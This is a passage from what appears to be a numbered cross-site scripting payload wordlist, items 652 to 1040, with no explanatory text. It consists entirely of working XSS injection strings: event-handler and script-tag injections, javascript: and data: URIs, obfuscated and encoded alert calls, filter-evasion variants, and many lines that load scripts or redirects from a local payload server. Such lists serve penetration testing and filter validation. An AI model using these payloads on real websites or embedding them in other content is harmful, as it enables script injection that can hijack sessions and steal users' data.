  652. "><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>​
  653. '><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>​
  654. <img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html"');>
  655. "><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html"');>
  656. '><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html"');>
  657. <table background=javascript:alert(1)></table>
  658. "><table background=javascript:alert(1)></table>
  659. '><table background=javascript:alert(1)></table>
  660. <object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf
  661. "><object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf
  662. '><object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf
  663. <applet code="javascript:confirm(1);">
  664. "><applet code="javascript:confirm(1);">
  665. '><applet code="javascript:confirm(1);">
  666. <marquee/onstart=confirm(2)>/
  667. "><marquee/onstart=confirm(2)>/
  668. '><marquee/onstart=confirm(2)>/
  669. <body onload=prompt(1);>
  670. "><body onload=prompt(1);>
  671. '><body onload=prompt(1);>
  672. <select autofocus onfocus=alert(1)>
  673. "><select autofocus onfocus=alert(1)>
  674. '><select autofocus onfocus=alert(1)>
  675. <textarea autofocus onfocus=alert(1)>
  676. "><textarea autofocus onfocus=alert(1)>
  677. '><textarea autofocus onfocus=alert(1)>
  678. <keygen autofocus onfocus=alert(1)>
  679. "><keygen autofocus onfocus=alert(1)>
  680. '><keygen autofocus onfocus=alert(1)>
  681. <video><source onerror="javascript:alert(1)">
  682. "><video><source onerror="javascript:alert(1)">
  683. '><video><source onerror="javascript:alert(1)">
  684. <a onmouseover="javascript:window.onerror=alert;throw 1>
  685. "><a onmouseover="javascript:window.onerror=alert;throw 1>
  686. '><a onmouseover="javascript:window.onerror=alert;throw 1>
  687. <img src=x onerror="javascript:window.onerror=alert;throw 1">
  688. "><img src=x onerror="javascript:window.onerror=alert;throw 1">
  689. '><img src=x onerror="javascript:window.onerror=alert;throw 1">
  690. <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
  691. "><body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
  692. '><body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
  693. <img style="xss:expression(alert(1))">
  694. "><img style="xss:expression(alert(1))">
  695. '><img style="xss:expression(alert(1))">
  696. <div style="color:rgb(''&#0;x:expression(alert(1))"></div>
  697. "><div style="color:rgb(''&#0;x:expression(alert(1))"></div>
  698. '><div style="color:rgb(''&#0;x:expression(alert(1))"></div>
  699. <a onmouseover=location=’javascript:alert(1)>click
  700. "><a onmouseover=location=’javascript:alert(1)>click
  701. '><a onmouseover=location=’javascript:alert(1)>click
  702. <body onfocus="location='javascrpt:alert(1) >123
  703. "><body onfocus="location='javascrpt:alert(1) >123
  704. '><body onfocus="location='javascrpt:alert(1) >123
  705. <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
  706. "><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
  707. '><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
  708. <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>
  709. "><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>
  710. '><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>
  711. <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  712. "><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  713. '><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  714. <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
  715. "><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
  716. '><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
  717. <style>#test{x:expression(alert(/X/))}</style>
  718. "><style>#test{x:expression(alert(/X/))}</style>
  719. '><style>#test{x:expression(alert(/X/))}</style>
  720. <object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
  721. "><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
  722. '><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>​
  723. "><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>​
  724. '><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>​
  725. <meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
  726. "><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
  727. '><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
  728. eval("s=document.createElement('script');alert(1);document.getElementsByTagName('head')[0].appendChild(s)")
  729. <meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"
  730. "><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"
  731. '><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"
  732. <meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"
  733. "><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html"
  734. '><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">
  735. "><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">
  736. '><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/X.html">
  737. javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”> [img=1]<img -/style=-=expression&#40/*’/-/*',/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>”"/>
  738. <img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)>
  739. "><img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)>
  740. '><img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)>
  741. <input id=x><input id=x><script>alert(x)</script>
  742. "><input id=x><input id=x><script>alert(x)</script>
  743. '><input id=x><input id=x><script>alert(x)</script>
  744. <a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>
  745. "><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>
  746. '><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>
  747. <script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
  748. "><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
  749. '><script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
  750. <a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>
  751. "><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>
  752. '><a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script>
  753. <a href="123" id=x>test</a><script>x='javascript:alert(1)';</script>
  754. "><a href="123" id=x>test</a><script>x='javascript:alert(1)';</script>
  755. '><a href="123" id=x>test</a><script>x='javascript:alert(1)';</script>
  756. <form name=self location="javascript:alert(1)"
  757. "><form name=self location="javascript:alert(1)"
  758. '><form name=self location="javascript:alert(1)">
  759. "><form name=self location="javascript:alert(1)"
  760. "><form name=self location="javascript:alert(1)"
  761. '><form name=self location="javascript:alert(1)">
  762. '><form name=self location="javascript:alert(1)"
  763. "><form name=self location="javascript:alert(1)"
  764. '><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
  765. "><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
  766. '><form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
  767. <form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
  768. "><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
  769. '><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script>
  770. %3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E
  771. %3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E
  772. <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x31\x29\x3B'>X
  773. "><a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x31\x29\x3B'>X
  774. '><a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x31\x29\x3B'>X
  775. data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E
  776. window.name//'name="javascript:alert("X")
  777. <svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()
  778. "><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()
  779. '><svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:()
  780. <%div%20style=xss:expression(prompt(1))>
  781. "><%div%20style=xss:expression(prompt(1))>
  782. '><%div%20style=xss:expression(prompt(1))>
  783. %22]);}catch(e){}if(!self.a)self.a=!alert(1);/
  784. <script>alert(1)</script>
  785. "><script>alert(1)</script>
  786. '><script>alert(1)</script>;
  787. "><script>alert(1)</script>;
  788. '><script>alert(1)</script>;
  789. <script>alert("/X"/)</script>
  790. "><script>alert("/X"/)</script>
  791. '><script>alert("/X"/)</script>
  792. <SCRIPT>a=/X/
  793. "><SCRIPT>a=/X/
  794. '><SCRIPT>a=/X/\nalert(1);</SCRIPT>
  795. "><SCRIPT>a=/X/
  796. "><SCRIPT>a=/X/
  797. '><SCRIPT>a=/X/\nalert(1);</SCRIPT>
  798. '><SCRIPT>a=/X/
  799. "><SCRIPT>a=/X/
  800. '><SCRIPT>a=/X/\nalert(1);</SCRIPT>
  801. <script>alert([!![]]+[])</script>
  802. "><script>alert([!![]]+[])</script>
  803. '><script>alert([!![]]+[])</script>
  804. <script>prompt(-[])</script>
  805. "><script>prompt(-[])</script>
  806. '><script>prompt(-[])</script>
  807. <scr/**/ipt>alert(1)</sc/**/ipt>
  808. "><scr/**/ipt>alert(1)</sc/**/ipt>
  809. '><scr/**/ipt>alert(1)</sc/**/ipt>
  810. #<script>alert(1)</script>
  811. "><script>alert(1)</script>
  812. '><script>alert(1)</script>
  813. \'><script>X<\/script>
  814. \'><body onload=\'X\'>
  815. ><script>X<\/script>
  816. <body onload="X">
  817. "><body onload="X">
  818. '><body onload="X">
  819. <img src="x:X" onerror="alert(1)">
  820. "><img src="x:X" onerror="alert(1)">
  821. '><img src="x:X" onerror="alert(1)">
  822. <img src=a onerror=alert(1)
  823. "><img src=a onerror=alert(1)
  824. '><img src=a onerror=alert(1)%0A>a
  825. "><img src=a onerror=alert(1)%0A>a
  826. '><img src=a onerror=alert(1)%0A>a
  827. onmouseover=alert(1);
  828. <<SCRIPT>alert(1);/
  829. "><<SCRIPT>alert(1);/
  830. '><<SCRIPT>alert(1);/
  831. <SCRIPT>a=/X/
  832. "><SCRIPT>a=/X/
  833. '><SCRIPT>a=/X/
  834. alert(1)
  835. alert(String.fromCharCode(49))
  836. alert(/1/.source)
  837. eval('alert(1)')
  838. this['EvAL'.toLowerCase()]('aLErT(1)'.toLowerCase())
  839. (alert(1)).replace(/.+/,eval);
  840. \u0061\u006c\u0065\u0072\u0074(1)
  841. eval('\u00' + '6' + '1'+'le' + '\u0072' + 't(1)')
  842. eval('\141\154\145\162\164\50\61\51')
  843. eval('\x61\x6c\x65\x72\x74(1)')
  844. eval('\x61ler\x74(1)')
  845. top['a\x6Cert'](1)
  846. x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
  847. setTimeout('alert(1)',0)
  848. setTimeout(\u0061\u006c\u0065\u0072\u0074(1),0);
  849. onerror=eval;throw'alert\x281\x29';
  850. expression(URL=0)
  851. expr\65 ssion(URL=0)
  852. expr\65 ss/*???*/ion(URL=0);
  853. expression\28URL=0\29
  854. expr\65 ss/*\&#x25;/ion\28URL=0\29
  855. \000045xpr\000065 ss/*BlABl/\\aaaaa!!!*
  856. feed:javascript:alert(1)
  857. feed:javascript&colon;alert(1)
  858. feed:data:text/html,%3cscript%3ealert%281%29%3c/script%3e
  859. feed:data:text/html,%3csvg%20onload=alert%281%29%3e
  860. data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
  861. d&#x61;t&#x61;&colon;text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
  862. data:_;;;:;base64_______,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
  863. <LAYER SRC="javascript:alert(1);"></LAYER>
  864. "><LAYER SRC="javascript:alert(1);"></LAYER>
  865. '><LAYER SRC="javascript:alert(1);"></LAYER>
  866. <LINK REL="stylesheet" HREF="javascript:alert(1);">
  867. "><LINK REL="stylesheet" HREF="javascript:alert(1);">
  868. '><LINK REL="stylesheet" HREF="javascript:alert(1);">
  869. <!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>
  870. "><SCRIPT>alert(1);</SCRIPT>
  871. '><SCRIPT>alert(1);</SCRIPT><![endif]-->
  872. "><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>
  873. "><SCRIPT>alert(1);</SCRIPT>
  874. '><SCRIPT>alert(1);</SCRIPT><![endif]-->
  875. '><!--[if gte IE 4]><SCRIPT>alert(1);</SCRIPT>
  876. "><SCRIPT>alert(1);</SCRIPT>
  877. '><SCRIPT>alert(1);</SCRIPT><![endif]-->
  878. <BASE HREF="javascript:alert(1);//">
  879. "><BASE HREF="javascript:alert(1);//">
  880. '><BASE HREF="javascript:alert(1);//">
  881. data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
  882. <script>alert(String.fromCharCode(75,67,70))</script>
  883. "><script>alert(String.fromCharCode(75,67,70))</script>
  884. '><script>alert(String.fromCharCode(75,67,70))</script>
  885. <IFRAME SRC="javascript:alert(1);"></IFRAME>
  886. "><IFRAME SRC="javascript:alert(1);"></IFRAME>
  887. '><IFRAME SRC="javascript:alert(1);"></IFRAME>
  888. <iframe src="javascript:alert(1); <
  889. "><iframe src="javascript:alert(1); <
  890. '><iframe src="javascript:alert(1); <
  891. <object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>
  892. "><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>
  893. '><object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></object>
  894. <SCRIPT>x=/X/ alert(x.source)</SCRIPT>
  895. "><SCRIPT>x=/X/ alert(x.source)</SCRIPT>
  896. '><SCRIPT>x=/X/ alert(x.source)</SCRIPT>
  897. <BODY ONLOAD=alert(1)>
  898. "><BODY ONLOAD=alert(1)>
  899. '><BODY ONLOAD=alert(1)>
  900. <ScRiPt+>prompt(1)</ScRiPt>
  901. "><ScRiPt+>prompt(1)</ScRiPt>
  902. '><ScRiPt+>prompt(1)</ScRiPt>
  903. <img src=X onerror=alert(1)>
  904. "><img src=X onerror=alert(1)>
  905. '><img src=X onerror=alert(1)>
  906. <img src=/ onerror=alert(1);>
  907. "><img src=/ onerror=alert(1);>
  908. '><img src=/ onerror=alert(1);>
  909. <BODY BACKGROUND="javascript:alert(1)">
  910. "><BODY BACKGROUND="javascript:alert(1)">
  911. '><BODY BACKGROUND="javascript:alert(1)">
  912. <TABLE BACKGROUND="javascript:alert(1)">
  913. "><TABLE BACKGROUND="javascript:alert(1)">
  914. '><TABLE BACKGROUND="javascript:alert(1)">
  915. <IMG SRC='vbscript:msgbox(1)'>
  916. "><IMG SRC='vbscript:msgbox(1)'>
  917. '><IMG SRC='vbscript:msgbox(1)'>
  918. <ScriPt>ALeRt(“ X ”)</scriPt>
  919. "><ScriPt>ALeRt(“ X ”)</scriPt>
  920. '><ScriPt>ALeRt(“ X ”)</scriPt>
  921. <a href="javascript#alert(1);">
  922. "><a href="javascript#alert(1);">
  923. '><a href="javascript#alert(1);">
  924. <div onmouseover="alert(1);">
  925. "><div onmouseover="alert(1);">
  926. '><div onmouseover="alert(1);">
  927. <BR SIZE="&{alert(1)}">
  928. "><BR SIZE="&{alert(1)}">
  929. '><BR SIZE="&{alert(1)}">
  930. &<script>alert(1);</script>
  931. "><script>alert(1);</script>
  932. '><script>alert(1);</script>
  933. &{alert(1);};
  934. <img src=&{alert(1);};>
  935. "><img src=&{alert(1);};>
  936. '><img src=&{alert(1);};>
  937. <img src="mocha:alert(1);">
  938. "><img src="mocha:alert(1);">
  939. '><img src="mocha:alert(1);">
  940. <img src="livescript:alert(1);">
  941. "><img src="livescript:alert(1);">
  942. '><img src="livescript:alert(1);">
  943. <a href="about:<script>alert(1);</script>
  944. "><script>alert(1);</script>
  945. '><script>alert(1);</script>">
  946. [\xC0][\xBC]script>alert(1);[\xC0][\xBC]/script>" };
  947. <object classid="clsid:..." codebase="javascript:alert(1);">
  948. "><object classid="clsid:..." codebase="javascript:alert(1);">
  949. '><object classid="clsid:..." codebase="javascript:alert(1);">
  950. <style><!--</style><script>alert(1);//--></script>
  951. "><style><!--</style><script>alert(1);//--></script>
  952. '><style><!--</style><script>alert(1);//--></script>
  953. <![CDATA[<!--]]<script>alert(1);//--></script>
  954. "><![CDATA[<!--]]<script>alert(1);//--></script>
  955. '><![CDATA[<!--]]<script>alert(1);//--></script>
  956. <!-- -- --><script>alert(1);</script>
  957. "><script>alert(1);</script>
  958. '><script>alert(1);</script><!-- -- -->
  959. javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
  960. <EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>
  961. "><EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>
  962. '><EMBED SRC="http://127.0.0.1:3555/xss_serve_payloads/flash.swf"></EMBED>
  963. <img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>
  964. "><img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>
  965. '><img src="http://127.0.0.1:3555/xss_serve_payloads/image.png" onerror=alert(1)>
  966. <img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>
  967. "><img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>
  968. '><img src="http://127.0.0.1:3555/xss_serve_payloads/gif.gif" onerror=alert(1)>
  969. <img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>
  970. "><img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>
  971. '><img src="http://127.0.0.1:3555/xss_serve_payloads/bmp.bmp" onerror=alert(1)>
  972. <img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>
  973. "><img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>
  974. '><img src="http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg" onerror=alert(1)>
  975. <meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">
  976. "><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">
  977. '><meta HTTP-EQUIV="REFRESH" content="0; url=http://127.0.0.1:3555/xss_serve_payloads/X.html">
  978. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  979. "><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  980. '><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  981. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  982. "><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  983. '><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  984. <BGSOUND SRC="javascript:alert(1);">
  985. "><BGSOUND SRC="javascript:alert(1);">
  986. '><BGSOUND SRC="javascript:alert(1);">
  987. <script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>
  988. "><script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>
  989. '><script type="text/javascript">window.open("http://127.0.0.1:3555/xss_serve_payloads/X.html","_self");</script>
  990. <SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  991. "><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  992. '><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  993. <SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  994. "><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  995. '><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  996. <SCRIPT a=">" '' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  997. "><SCRIPT a=">" '' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  998. '><SCRIPT a=">" '' SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  999. <SCRIPT "a='>'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1000. "><SCRIPT "a='>'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1001. '><SCRIPT "a='>'" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1002. <SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1003. "><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1004. '><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1005. <SCRIPT a=">'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1006. "><SCRIPT a=">'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1007. '><SCRIPT a=">'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1008. <SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1009. "><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1010. '><SCRIPT =">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1011. <SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1012. "><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1013. '><SCRIPT a=">" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1014. <SCRIPT a=">" '' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1015. "><SCRIPT a=">" '' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1016. '><SCRIPT a=">" '' SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1017. <SCRIPT "a='>'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1018. "><SCRIPT "a='>'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1019. '><SCRIPT "a='>'" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1020. <SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1021. "><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1022. '><SCRIPT a=`>` SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1023. <SCRIPT a=">'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1024. "><SCRIPT a=">'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1025. '><SCRIPT a=">'>" SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1026. <TABLE><TD BACKGROUND="javascript:alert(1)">
  1027. "><TABLE><TD BACKGROUND="javascript:alert(1)">
  1028. '><TABLE><TD BACKGROUND="javascript:alert(1)">
  1029. <img src='http://127.0.0.1:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"'>
  1030. "><img src='http://127.0.0.1:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"'>
  1031. '><img src='http://127.0.0.1:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"'>
  1032. <img src='http://127.0.0.1:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"'>
  1033. "><img src='http://127.0.0.1:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"'>
  1034. '><img src='http://127.0.0.1:3555/xss_serve_payloads/gif.gif' onload='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"'>
  1035. <img src='http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"'>
  1036. "><img src='http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"'>
  1037. '><img src='http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/X.js"'>
  1038. <img src='http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"'>
  1039. "><img src='http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"'>
  1040. '><img src='http://127.0.0.1:3555/xss_serve_payloads/xxxgif.gif' onerror='document.scripts(0).src="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"'>
